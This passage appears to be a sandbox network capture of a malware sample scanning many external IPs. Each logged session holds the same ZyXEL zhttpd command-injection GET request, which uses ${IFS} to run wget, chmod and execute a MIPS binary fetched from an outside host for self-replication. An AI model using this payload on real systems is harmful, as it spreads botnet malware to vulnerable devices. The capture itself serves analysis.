                                      Jan 14, 2024 15:50:55.500554085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6535192.168.2.1452084205.96.106.140443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.500608921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6536192.168.2.143920620.243.216.251443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.500637054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6537192.168.2.143517495.125.135.221443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.500674963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6538192.168.2.145552850.251.14.229443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.500715017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6539192.168.2.144791473.80.186.42443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.500741005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6540192.168.2.1434050202.125.54.107443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.500801086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6541192.168.2.145347287.167.55.90443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.500847101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6542192.168.2.144838881.61.157.196443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.500895977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6543192.168.2.14558805.218.137.245443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.500933886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6544192.168.2.145709894.142.12.221443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.500958920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6545192.168.2.145611674.29.123.42443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.501014948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6546192.168.2.1450792159.50.187.122443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.501049042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6547192.168.2.144054214.188.175.190443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.501111984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6548192.168.2.1434212171.20.234.185443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.501138926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6549192.168.2.1448086201.20.41.43443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.501173019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6550192.168.2.145288661.81.137.2443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.501205921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6551192.168.2.145170249.24.178.30443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.501255989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6552192.168.2.14353708.179.66.112443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.501288891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6553192.168.2.1438894160.161.10.5443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.501315117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6554192.168.2.1446854102.37.252.174443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.501353979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6555192.168.2.1452440122.79.244.156443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.501394033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6556192.168.2.145341861.86.202.19443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.501439095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6557192.168.2.145786447.147.150.34443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.501475096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6558192.168.2.1453058198.250.36.104443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.501528025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6559192.168.2.1458446221.127.198.78443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.501581907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6560192.168.2.1436508183.67.66.18443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.501626968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6561192.168.2.1437262208.45.57.2443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.501663923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6562192.168.2.14367268.191.230.83443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.501718044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6563192.168.2.14331589.85.198.124443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.501744986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6564192.168.2.1438578202.239.167.78443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.501796961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6565192.168.2.1444016125.123.21.181443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.501833916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6566192.168.2.145164278.219.14.145443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.501892090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6567192.168.2.1455772205.217.81.191443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.501908064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6568192.168.2.144324643.209.117.71443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.501964092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6569192.168.2.144887619.4.97.136443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.501991987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6570192.168.2.1449992157.54.139.2443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.502052069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6571192.168.2.1438588140.83.109.186443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.502079010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6572192.168.2.145750497.162.131.203443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.502125978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6573192.168.2.144435283.244.41.169443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.502149105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6574192.168.2.1438412198.55.31.105443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.502202988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6575192.168.2.1450728203.4.80.163443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.502228975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6576192.168.2.1442170146.30.170.248443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.502278090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6577192.168.2.1442226177.111.188.106443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.502331018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6578192.168.2.1453568219.234.17.108443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.502358913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6579192.168.2.1433278144.2.85.66443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.502388000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6580192.168.2.144699049.23.0.177443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.502434015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6581192.168.2.1432846141.225.188.202443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.502456903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6582192.168.2.143375888.129.188.79443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.502506971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6583192.168.2.1447080170.208.105.193443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.502547979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6584192.168.2.1450038158.63.1.26443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.502583981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6585192.168.2.1449596192.84.215.8443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.502631903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6586192.168.2.145920237.180.114.101443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.502665043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6587192.168.2.1449828161.192.152.2443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.502718925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6588192.168.2.1451206115.88.166.58443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.502748013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6589192.168.2.1439288165.132.211.41443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.502788067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6590192.168.2.1434196152.240.216.180443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.502815962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6591192.168.2.145003278.165.148.23443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.502871990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6592192.168.2.1457182139.209.140.162443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.502912998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6593192.168.2.144782444.123.203.157443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.502938986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6594192.168.2.1436578131.161.185.13443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.502981901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6595192.168.2.1458438195.129.209.184443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.503032923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6596192.168.2.144550843.116.199.23443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.503066063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6597192.168.2.143798223.76.178.156443
                                      TimestampBytes transferredDirectionData
